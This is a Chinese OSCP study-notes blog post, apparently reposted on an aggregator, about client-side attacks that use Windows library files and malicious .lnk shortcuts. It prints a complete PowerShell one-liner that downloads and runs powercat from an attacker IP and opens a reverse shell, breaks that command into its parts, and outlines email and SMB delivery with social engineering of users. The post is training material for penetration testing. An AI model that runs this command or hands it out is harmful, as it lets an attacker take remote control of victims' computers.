当前位置: 首页 > news >正文

6-6〔O҉S҉C҉P҉ ◈ 研记〕❘ 客户端攻击▸利用Windows库文件进行攻击-2

      郑重声明: 本文所有安全知识与技术,仅用于探讨、研究及学习,严禁用于违反国家法律法规的非法活动。对于因不当使用相关内容造成的任何损失或法律责任,本人不承担任何责任。 如需转载,请注明出处且不得用于商业盈利。 

    💥👉点赞❤️ 关注🔔 收藏⭐️ 评论💬💥 
     更多文章戳👉
晖度丨安全视界-CSDN博客🚀(原名:whoami!)​​​​​


𖤐 客户端攻击通常是欺骗用户在操作系统上执行恶意代码,小心啊 ! 

𖤐 𝓒𝓵𝓲𝓮𝓷𝓽-𝓼𝓲𝓭𝓮 𝓪𝓽𝓽𝓪𝓬𝓴𝓼 𝓾𝓼𝓾𝓪𝓵𝓵𝔂 𝓽𝓻𝓲𝓬𝓴 𝓾𝓼𝓮𝓻𝓼 𝓲𝓷𝓽𝓸 𝓮𝓍𝓮𝓬𝓾𝓽𝓲𝓷𝓰 𝓶𝓪𝓵𝓲𝓬𝓲𝓸𝓾𝓼 𝓬𝓸𝓭𝓮 𝓸𝓷 𝓽𝓱𝓮 𝓸𝓹𝓮𝓻𝓪𝓽𝓲𝓷𝓰 𝓼𝔂𝓼𝓽𝓮𝓶, 𝓼𝓸 𝓫𝓮 𝓬𝓪𝓻𝓮𝓯𝓾𝓵 !


→ 信息收集

→ 漏洞检测

→ 初始立足点▸客户端攻击▸利用Windows库文件进行攻击-2-----我们在这儿~ 🔥🔥🔥

→ 权限提升 

→ 横向移动

→ 报告/分析

→ 教训/修复  

目录

1 客户端攻击

1.2 利用Windows库文件进行客户端攻击

1.2.3 创建恶意快捷方式文件.lnk

1.2.3.1 攻击链完整流程

1.2.3.2 创建恶意快捷方式文件

1.2.4 攻击者主机准备工作

1.2.4.1 各类文件投放策略说明

1.2.4.2 攻击者服务器开启三种服务

1.2.5 库文件投递操作

1.2.5.1 库文件通过邮件附件投递(可选)

1.2.5.2 库文件通过SMB共享投递

1.2.6 获得反向shell

1.3 防御检测与规避

💥创作不易💥求一波暴击👉点赞❤️ 关注🔔 收藏⭐️ 评论💬


1 客户端攻击

1.2 利用Windows库文件进行客户端攻击

接前文,目前已经完成了库文件链接到WebDAV的共享目录。接下来要做:

  • 🐚 载荷部署:在WebDAV共享目录放置恶意快捷方式文件(实现反向shell)

  • 📧 邮件投递:将库文件作为附件发送

  • 🎣 诱导执行:通过社会工程学诱导用户点击(执行)

  • 🔙 建立连接:成功获取反向shell

1.2.3 创建恶意快捷方式文件.lnk

1.2.3.1 攻击链完整流程


1.2.3.2 创建恶意快捷方式文件

powershell代码执行流程示意:

反向shell流程示意:

  • 右键桌面 → 新建 → 快捷方式

  • 输入恶意PowerShell命令

  • 把命令输入到下图红框处

  • 这样快捷方式文件就完成了

powershell.exe -c "IEX(New-ObjectSystem.Net.Webclient).Downloadstring('http://192.168.119.3:8000/powercat.ps1');powercat-c 192.168.119.3-p 4444 -e powershell"

📋 命令组件分解表

组件部分 具体内容 功能作用
可执行程序 powershell.exe 启动PowerShell解释器
执行参数 -c 执行后续字符串中的命令
下载组件 IEX(New-Object System.Net.WebClient).DownloadString() 远程下载并执行脚本内容
下载地址 http://192.168.119.3:8000/powercat.ps1 从攻击者服务器下载PowerCat工具
PowerCat参数 powercat -c 192.168.119.3 -p 4444 -e powershell 建立反向
http://www.dtcms.com/a/581427.html

相关文章:

  • SSM文创产品推荐系统设计与实现95ml5(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
  • WebSocket 核心 API 速查表
  • 多功能电脑PDF转换工具Icecream PDFv3.15 中文绿色便携版
  • 在线ftp传网站文件有空间域名服务器怎么做网站
  • 独立站的优势和劣势和运营技巧
  • 软考 系统架构设计师系列知识点之杂项集萃(192)
  • 在Vagrant 2.4.9中安装Rocky 9和Docker
  • 儿童网站设计百度怎么做自己网站
  • Mysql作业4
  • ComfyUI(8)--- 老照片修复(1)
  • 企业网站的首页网站备案 公司注销吗
  • 网站 功能呢如何制作apple pencil
  • php项目ueditor上传pdf文件,防止XSS攻击
  • 876. 链表的中间结点
  • 排序算法:堆排序、快速排序、归并排序
  • qData 数据中台开源版 v1.0.7 发布:新增 SQL Server 支持,快速部署支持达梦与 MySQL 主库切换!
  • Qt 自定义加载动画控件:带文字提示的等待 spinner 实现
  • 织梦做淘宝客网站视频教程移动互联网开发找工作
  • Vue3 任务管理器(Pinia 练习)
  • 没有域名可以做网站吗个人网页设计绘画作品
  • 百胜软件做客华为云生态直播间:全渠道中台如何赋能零售数字化与全球布局?
  • 航电系统架构演进与要点概述
  • 华为云ELB
  • 医疗智能体(eiHealth) 3.4.0 使用指南(for 华为云Stack 8.5.0) 0. 华为除了这个 还有医疗 和生信方面的 产品
  • 写作教学网站wordpress 管理员账号在哪里查询
  • 完善服务终端:一洽对话结束与异常场景提示语设置
  • 从阿里云大模型服务平台百炼看AI应用集成与实践
  • 【图像处理】图像的基础几何变换
  • uniapp + uni-ui + vue3转cli
  • 户外保险网站wordpress icon 插件